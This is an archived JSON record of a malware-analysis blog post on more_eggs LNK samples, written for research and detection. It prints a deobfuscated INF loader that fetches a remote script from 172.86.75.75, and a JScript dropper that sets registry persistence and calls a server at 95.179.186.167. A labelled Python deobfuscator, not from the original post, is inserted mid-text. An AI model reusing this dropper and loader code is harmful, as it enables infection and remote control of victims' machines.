{
	"id": "c12a69db-2342-4961-ad2d-f5bb691bcc7e",
	"created_at": "2026-04-06T00:06:35.448746Z",
	"updated_at": "2026-04-10T03:20:18.708521Z",
	"deleted_at": null,
	"sha1_hash": "24d332fc60e13bffb18ef8b5a75c0532576a0bbf",
	"title": "HOW DO YOU LIKE DEM EGGS? I LIKE MINE SCRAMBLED, REALLY SCRAMBELED - A LOOK AT A RECENT more_eggs SAMPLES",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 297491,
	"plain_text": "HOW DO YOU LIKE DEM EGGS? I LIKE MINE\r\nSCRAMBLED, REALLY SCRAMBELED - A LOOK AT A\r\nRECENT more_eggs SAMPLES\r\nBy Mo Bustami\r\nPublished: 2023-03-10 · Archived: 2026-04-05 21:23:22 UTC\r\nBACKGROUND\r\nThis blog will just focus on some recent samples related to what I think is more_eggs and my attempt (successful\r\nor not, I will let you be the judge of that) at analyzing them and some questions I have. I won't be discussing any\r\nattribution or providing my thoughts on that in this blog.\r\nHIGH LEVEL ANALYSIS OF SAMPLES\r\nFile Name: Axiance_Full_Reports[.]zip\r\nHash: 631f92c9147733acf3faa02586cd2a6cda673ec83c24252fccda1982cf3e96f6\r\nThe file is a ZIP file that includes an LNK file and a JPG. The LNK, as you would expect, includes obfuscated\r\ncode within it that is consistent with these types of campaigns.\r\n\u0026\u0026 c!QlGg!!dFsw!!dFsw!!S5nNX4N6!\"k49ZUgX7=%!pKaN!!fJtJ!!oMCB!!PBuJ!\\!pocM!!nHka!!Vtvt!!Ugrg!!pocM!!Mb\r\n for % t in (\"!vZRh!!hixu!!nHka!!iedc!!cMXL!!pocM!!oLOE!!MbnQ!!DDvC!\"\r\n \"s!pocM!!yysv!!MbnQ!!QlGg!!pKaN!!Ugrg!!iedc!!nHka! = $!Assh!i!MbnQ!!CVhO!o!Assh!!cMXL! 
n!pKaN\r\n \"!vZRh!!CVhO!!nHka!s!pKaN!!pocM!!MbnQ!!QlGg!!pKaN!!pocM!!oLOE!!MbnQ!!CVhO!!pocM!!iedc!!cMXL!\r\nhttps://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1\r\nPage 1 of 6\n\n\"!opYD!!Vtvt!!IuyJ!!GgqK!!lmPv!!AFHZ!!NjEt!\"\r\n \"!vZRh!!CVhO!!nHka!!IMmt!!QlGg!!Ugrg!!dFsw!!pKaN!!pocM!!MbnQ!s!pKaN!!QlGg!!dFsw!!dFsw!!FEKw!\r\n \"!uZmj!!MbnQ!!jYoa!!nHka!!yysv!!pocM!!cMXL!!pKaN!!nHka!!iedc!!kfTF!!eVUC!!rjNA!!cMXL!!lmPv!!o\r\n \"!CVhO!!nHka!!dFsw!!IMmt!!pocM!!dFsw!!nHka!!cMXL!!lmPv!!opYD!!Vtvt!!IuyJ!!GgqK!\"\r\n \"!vZRh!!oijN!!AFHZ!!pChT!!oijN!!ihiq!!DDvC!\"\r\n \"!PBuJ!!NjEt!!NjEt!!PBuJ!\\!cMXL!!Iiwf!!jYoa!!oLOE!!AeOE!!dwJy!!DBOh!!HYYC!!ySTZ!!DBOh!!ORXc!\r\n \"!vZRh!!opYD!!Vtvt!!IuyJ!!GgqK!!DDvC!\"\r\n \"!pocM!!nHka!!Ugrg!!pocM!!PBuJ!!Vtvt!!pKaN!!yysv!!LlDf!!AFHZ!!PBuJ!!FEKw!!pocM!!MbnQ!!IMmt!\"\r\n \"!vZRh!!cMXL!!pKaN!!iedc!!pocM!!MbnQ!!yysv!!cMXL!]\"\r\n \"!cMXL!!nHka!!iedc!!hixu!!pocM!!Iiwf!!nHka!n!QlGg!m!nHka!!lmPv!!OJQo! '\"\r\n \"!cMXL!!ORXc!!oLOE!!iedc!!pKaN!!cMXL!!hixu!!Iiwf!!MbnQ!!QlGg!!fJtJ!!nHka!!lmPv!!OJQo! '\"\r\n \"!Vtvt!!pKaN!!yysv!!LlDf!!AFHZ!!lmPv!!MbnQ!!pocM!!pKaN!\") do @!nHka!!Iiwf!!ORXc!!oLOE! 
% ~t)\r\n\"!.%SystemRoot%\\System32\\SHELL32.dll\r\nUsing the magic of CyberChef you can deobfuscate this and get something a bit cleaner:\r\n\u0026\u0026 call S5nNX4N6 \"k49ZUgX7=%tmp%\\ie4uinit.exe\" \u0026\u0026 call S5nNX4N6 \"9AB2eyHk=%tmp%\\ieuinit.inf\" \u0026\u0026 (\r\n for % t in (\"[version]\"\r\n \"signature = $windows nt$\"\r\n \"[destinationdirs]\"\r\n \"A45E=01\"\r\n \"[defaultinstall.windows7]\"\r\n \"UnRegisterOCXs=F07FD\"\r\n \"delfiles=A45E\"\r\n \"[F07FD]\"\r\n \"%11%\\scRobj,NI,http://172.86.75.75/robot.php\"\r\n \"[A45E]\"\r\n \"ieui%4tg90%.inf\"\r\n \"[strings]\"\r\n \"servicename=' '\"\r\n \"shortsvcname=' '\"\r\n \"4tg90=nit\") do @echo % ~t) \u003e \"9AB2eyHk\" \u0026\u0026 call copy / Y % windir % \\System32\\ ie4uinit.exe\r\n\".%SystemRoot%\\System32\\SHELL32.dll\r\nDOMO ARIGATO MR ROBOTO\r\nI tried looking for the robot.php file associated with the above IP address in virus repositories but was not\r\nsuccessful, probably due to me getting stale. However, I was able to find a variant of it in an LNK sample\r\nsubmitted to Hybrid Analysis, which can also be found at VirusTotal. The script is sizeable and heavily obfuscated. The\r\nclosest to any analysis of something similar can be found at this Expel blog, but still it was not quite the same.\r\nWhile I can probably spend a whole blog going through the obfuscation and the deobfuscation logic, I would\r\nnever be as good as (@Arkbird_SOLG); their analysis is referenced in the intro. I also wanted to do this quickly.\r\nAnd as you might know, I have been relying on some old tools in the arsenal that seem to still work against these\r\nobfuscated scripts.\r\nAn old friend is a trusted one - Malzilla to the rescue. While the script broke Malzilla, it was still good enough\r\nto produce a deobfuscated output. 
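Added example (not part of the original post, and not the LNK author's code): the obfuscation in the LNK command quoted earlier is cmd.exe delayed expansion, where each !name! token is an environment variable holding a single character that was defined with set earlier in the same command line; those definitions are presumably in the part of the command that is not quoted on the page. The Python below does what the CyberChef step does by hand: it collects the set definitions, expands every reference, and drops references to names that were never defined, which matches what cmd.exe does with delayed expansion enabled. The variable names, the one-character values and the recovered command in SAMPLE are constructed for this example and are not the tokens from the real sample; the constructed path uses a forward slash only because the example avoids backslashes.

```python
import re

# A cmd.exe delayed-expansion reference: !name!
REF = re.compile(r'!([A-Za-z0-9_]+)!')
# A definition such as  set QA=a  (a quoted  name=value  form is handled by
# stripping the quotes below). The value runs up to the next ampersand so that
# chained definitions like  set X=1&&set Y=2  split cleanly.
SETLINE = re.compile(r'(?<![A-Za-z0-9])set +([^ =]+)=([^&]*)', re.IGNORECASE)

# Constructed stand-in for a LNK argument string (NOT the tokens from the real sample):
# eleven one-character variables, then a command built almost entirely from references.
# !ZZZZ! is never defined, so it must expand to nothing, as it would under cmd /v:on.
SAMPLE = (
    'cmd /v:on /c set QA=a&&set QB=l&&set QC=s&&set QD=e&&set QE=t&&set QF=%'
    '&&set QG=m&&set QH=p&&set QI=i&&set QJ=u&&set QK=n'
    '&& c!QA!!QB!!QB! !QC!!QD!!QE! k=!QF!!QE!!QG!!QH!!QF!/!QI!!QD!4!QJ!!QI!!QK!!QI!!QE!.!QD!x!QD!!ZZZZ!'
)


def parse_definitions(cmd):
    '''Map every name defined by a set statement to its value (cmd.exe names are
    case-insensitive, so keys are lower-cased).'''
    quote = chr(34)
    defs = {}
    for m in SETLINE.finditer(cmd):
        name = m.group(1).strip(quote).lower()
        value = m.group(2).strip(quote)
        defs[name] = value
    return defs


def resolve(text, defs, max_rounds=10):
    '''Expand !name! references the way delayed expansion does: a defined name
    becomes its value, an undefined name becomes an empty string. A few rounds
    cover values that themselves contain references.'''
    for _ in range(max_rounds):
        expanded = REF.sub(lambda m: defs.get(m.group(1).lower(), ''), text)
        if expanded == text:
            break
        text = expanded
    return text


def deobfuscate(cmd):
    '''Return the command that follows the last set definition, fully expanded.
    %var% references are left alone on purpose: they name real variables on the
    victim (e.g. %tmp%) and belong in the recovered command.'''
    defs = parse_definitions(cmd)
    last_end = 0
    for m in SETLINE.finditer(cmd):
        last_end = m.end()
    tail = cmd[last_end:].lstrip('& ')
    return resolve(tail, defs)


if __name__ == '__main__':
    print(deobfuscate(SAMPLE))   # call set k=%tmp%/ie4uinit.exe
```

To use it on a real LNK, extract the complete argument string with any LNK parser and pass it whole to deobfuscate(); if the output still contains !tokens!, the definitions for those names are not in the text you captured, which is also a useful signal that the command was truncated.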
You can see that I used document.write to get the output of the code.\r\nHere is the partial output after it was beautified:\r\nvar WScriptShell = NWgYzNFhUglH676(cApePRxKlMQqu834(atZLWcjMYNmeC751, uJqroxwXiRZAa975));\r\nvar DropperPath = WScriptShell.ExpandEnvironmentStrings(\"%appdata%\");\r\nDropperPath = DropperPath + \"\\\\Microsoft\\\\\";\r\nvar LoaderFileName = \"6HGRAI3D0RB72LRS.txt\";\r\nvar PersFileName = \"RRALRCEOH5NXDDOJVPNVFH.txt\";\r\nvar MsxslPath = DropperPath + cApePRxKlMQqu834(jHkwPHCIFnWO772, uJqroxwXiRZAa975);\r\nvar Decoded = MXZzNoSNqRUcKla430(EALrYFeDuAfV488, EALrYFeDuAfV488.length);\r\nvar ba = RyOCxzf831(Decoded, uJqroxwXiRZAa975);\r\nvar objFSO = NWgYzNFhUglH676(cApePRxKlMQqu834('qe)HZkC!=E|gs@q[6l6XsB8,VemdI[$X', uJqroxwXiRZAa975))\r\nif (!objFSO.FileExists(MsxslPath)) {\r\n var actxobj = NWgYzNFhUglH676(cApePRxKlMQqu834(RgpeqURe598, uJqroxwXiRZAa975));\r\n actxobj.open();\r\n actxobj.position = 0;\r\n actxobj.type = 2;\r\n actxobj.charset = (437);\r\n actxobj.writeText(aUxgUyvEj840(ba));\r\n payload = 0;\r\n actxobj.saveToFile(MsxslPath);\r\n actxobj.close();\r\n}\r\nvar DecodedPayer = MXZzNoSNqRUcKla430(qctzvdIf439, qctzvdIf439.length);\r\nvar BBA = RyOCxzf831(DecodedPayer, uJqroxwXiRZAa975);\r\nvar pays = aUxgUyvEj840(BBA);\r\nSaveTextToFile(DropperPath + LoaderFileName, pays);\r\nvar DecodedPers = MXZzNoSNqRUcKla430(EoLfzNlg964, EoLfzNlg964.length);\r\nvar BBS = RyOCxzf831(DecodedPers, uJqroxwXiRZAa975);\r\nvar PersPays = aUxgUyvEj840(BBS);\r\nSaveTextToFile(DropperPath + PersFileName, PersPays);\r\nvar ActXobj1 = NWgYzNFhUglH676(cApePRxKlMQqu834(atZLWcjMYNmeC751, uJqroxwXiRZAa975));\r\nvar CommandToRun = 'cmd /c start /min \"\" \"' + MsxslPath + '\" \"' + DropperPath + LoaderFileName + '\" \"\r\ntry {\r\n ActXobj1.RegWrite(\"HKCU\\\\Environment\\\\UserInitMprLogonScript\", 'cscript /b /e:jscript \"%APPDATA%\\\r\n} catch (e) {}\r\ntry {\r\n 
 var vkxvlqbn570 = NWgYzNFhUglH676(cApePRxKlMQqu834('tFqdph]S\"tSe54u]`%gCA', uJqroxwXiRZAa975));\r\n vkxvlqbn570.ShellExecute(cApePRxKlMQqu834(jHkwPHCIFnWO772, uJqroxwXiRZAa975), LoaderFileName + \"\r\n} catch (e) {}\r\ntry {\r\n var vkxvlqbn570 = GetObject(cApePRxKlMQqu834('6C\"F%ZoiOuIDLit};iJX@QRg|*+XzMAXz{8\"4YN\u003cfk;gZi4nQIu\r\n var vkxvlqbn72 = vkxvlqbn570.Get(cApePRxKlMQqu834('aCAzD@WMfBMlp4p|', uJqroxwXiRZAa975)).Create(C\r\n if (vkxvlqbn72 !== 0) {\r\n vkxvlqbn354;\r\n }\r\n} catch (vkxvlqbn3118) {\r\n try {\r\n ActXobj1.Run(CommandToRun, 0, 0);\r\n vkxvlqbn0937 = 1;\r\n } catch (vkxvlqbn4910) {\r\n vkxvlqbn0937 = 0;\r\n }\r\n}\r\ntry {\r\n var ConnectionLite;\r\ntry {\r\n ConnectionLite = new ActiveXObject(\"MSXML2.ServerXMLHTTP\");\r\n } catch (e) {\r\n try {\r\n ConnectionLite = new ActiveXObject(\"Msxml2.XMLHTTP.6.0\");\r\n } catch (e) {\r\n try {\r\n ConnectionLite = new ActiveXObject(\"Msxml2.XMLHTTP.3.0\");\r\n } catch (e2) {\r\n ConnectionLite = new ActiveXObject(\"Microsoft.XMLHTTP\");\r\n }\r\n }\r\n }\r\n ConnectionLite.open(\"GET\", \"http://95.179.186.167/Writer.php?deploy=\" + CommandToRun, false);\r\n ConnectionLite.send();\r\n} catch (ee) {}\r\nIf you want to rely on purely online tools, I stumbled across this one here and it seems to be working really well -\r\n https://onecompiler.com/javascript. You will just need to modify the code from document.write to console.log.\r\nI hope the above code can be used to write detection and hunting rules; many of the variable names seem to be\r\nstatic once they are decoded, so that could be a good start.\r\nAnd here is where my question or mystery begins. When I tried to do the same for the robot.php script from the\r\noriginal 172.86.75.75, the script seemed to be either missing or not decoding as I would like it to be. I tried\r\nmessing with the logic to see if I missed anything, but no dice. 
I am happy to share the script for anyone else who\r\nwould like to take a look, and I also uploaded it to VirusTotal.\r\nADDITIONAL SAMPLES\r\nI wanted to see if I could find additional \"recent\" samples of LNK files using a similar obfuscation and delivery\r\nmechanism. I hunted using \"behaviour_files:\"%TEMP%\\\\ieuinit.inf\"\" and according to VirusTotal below are\r\nthe recent ones:\r\n631f92c9147733acf3faa02586cd2a6cda673ec83c24252fccda1982cf3e96f6\r\nbfe048ba91218019b64ab8477dad3ba6033cbc584f0d751d2866023b2b546c2e\r\n4ba964764210607f3bab884a14afa0b917891cff969a309bbbc12d3321386352\r\na99508a91168ebebb3779c8a69fbbc8c51cc019ba794b1e5f4c2d7a4c5b0777a\r\n36bf06bde63af8cdd673444edf64a323195fe962b3256e0269cdd7a89a7e2ae1\r\nI did not go hunting for samples of the main obfuscated JS payload, but there might be some additional samples\r\nlying around.\r\nI did not have time to go and do a telemetry analysis and infrastructure mapping of these campaigns, but if I have\r\nsome spare time I might put that down in another blog post.\r\nONE FINAL EASTER EGG - see what I did there\r\nFor 172.86.75.75, a Censys scan showed port 8080 open, and taking a quick look at it, it seemed like it was\r\nsome sort of C2 panel/access to potential victims; not sure if it is related to this campaign or something else.\r\nClicking on any of the buttons seems like it could potentially show screenshots from victims' emails/browser/etc.\r\nSource: https://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1"
	],
	"report_names": [
		"how-do-you-like-dem-eggs-i-like-mine.html?m=1"
	],
	"threat_actors": [],
	"ts_created_at": 1775433995,
	"ts_updated_at": 1775791218,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/24d332fc60e13bffb18ef8b5a75c0532576a0bbf.pdf",
		"text": "https://archive.orkl.eu/24d332fc60e13bffb18ef8b5a75c0532576a0bbf.txt",
		"img": "https://archive.orkl.eu/24d332fc60e13bffb18ef8b5a75c0532576a0bbf.jpg"
	}
}